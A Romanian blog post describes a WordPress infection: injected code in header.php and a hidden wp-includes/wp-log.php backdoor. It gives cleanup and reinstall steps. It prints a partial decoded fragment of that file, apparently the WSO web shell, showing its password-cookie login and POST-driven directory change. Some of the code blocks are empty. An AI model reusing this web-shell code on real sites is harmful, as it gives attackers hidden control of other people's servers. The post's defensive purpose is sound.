WordPress Virus – PHP Hack – Remove WordPress Virus

Zilele trecute am observat aparatia unui cod suspect (virus / malware) in  sursa unui blog care ruleaza WordPress. Urmatorul cod PHP era prezent in header.php, inainte de linia </head>.

[php][/php]

Nu stiu exact cum se numeste acest virus si nimci macar ce face el exact, insa este invizibil pentru vizitatorii site-urilor afectate. In schimb, provoaca o depunctare imensa in motoarele de cautare (in special in Google) si implicit scaderea semnificativa a numarului de vizitatori pe web site-urile afectate.

Detalii stiute despre fisierele acestui virus:

1. Codul de mai sus, prezent in header.php

2. Aparitia unui fisier wp-log.php in folderul wp-includes.

wp-log

3. wp-log.php contine urmatul cod, criptat:

[php][/php]

Decriptare cod din wp-log.php :

[php]

” );
}

function WSOsetcookie($k, $v) {
$_COOKIE[$k] = $v;
setcookie($k, $v);
}

if(!empty($auth_pass)) {
if(isset($_POST[‘pass’]) && (md5($_POST[‘pass’]) == $auth_pass))
WSOsetcookie(md5($_SERVER[‘HTTP_HOST’]), $auth_pass);

if (!isset($_COOKIE[md5($_SERVER[‘HTTP_HOST’])]) || ($_COOKIE[md5($_SERVER[‘HTTP_HOST’])] != $auth_pass))
wsoLogin();
}

if(strtolower(substr(PHP_OS,0,3)) == “win” )
$os = ‘win’;
else
$os = ‘nix’;

$safe_mode = @ini_get(‘safe_mode’);
if(!$safe_mode)
error_reporting(0);

$disable_functions = @ini_get(‘disable_functions’);
$home_cwd = @getcwd();
if(isset($_POST[‘c’]))
@chdir($_POST[‘c’]);
$cwd = @getcwd();
if($os == ‘win’) {
$home_cwd = str_replace(“\\”, “/”, $home_cwd);
$cwd = str_replace(“\\”, “/”, $cwd);
}
if($cwd[strlen($cwd)-1] != ‘/’)
$cwd .= ‘/’;
?>
[/php]

4. Daca se acceseaza direct pagina numeblog.com/wp-includes/wp-log.php apare o pagina cu un camp de autentificare. La prima vedere pare a fi un file manager.

DEVIRUSARE WORDPRESS.

1. In primul rand stergeti codul din header.php si fisierul wp-log.php din wp-includes.

2. Verificati fisierul .htaccess de directive suspecte. Linii de permisiuni sau de executare script.

3. Verificati folderul temei (/wp-content/themes/nume_tema). Cautati daca exista fisiere noi si daca cele existente (in special fisierele .php) au suferit modificari suspecte.

4. Verificati folderul de plugin-uri (wp-content/plugins).

5. Verificati wp-content de fisiere suspecte.

6. Verificati permisiunile de scriere pentru foldere si pentru fisiere. chmod si chown.

SUGESTII DE DEVIRUSARE WORDPRESS.

1. In primul este bine sa faceti un backup la toate fisierele blogului si la baza de date.

2. Stergeti folderele wp-admin si wp-includes si toate fisierele .php din radacina site-ului. Daca aveti fisiere .php personalizate, este bine sa le verificati manual.

3. Descarcati versiune curenta de WordPress si upload.

4. Verificati in baza de date daca nu cumva a fost creat un user cu rang de administrator.

Cam atat avem de spus despre acest virus, dar daca aveti de adus completari sau daca mai descoperim noi detalii, o sa actualizam cu placere acest articol.

STEALTH SETTINGSREMOVE WORDPRESS VIRUS .

WordPress Virus – PHP Hack – Remove WordPress Virus

About the author

Stealth L.P.

Fondator si editor Stealth Settings, din 2006 pana in prezent.
Experienta pe sistemele de operare Linux (in special CentOS), Mac OS X , Windows XP > Windows 10 si WordPress (CMS).

Leave a Comment

This site uses Akismet to reduce spam. Learn how your comment data is processed.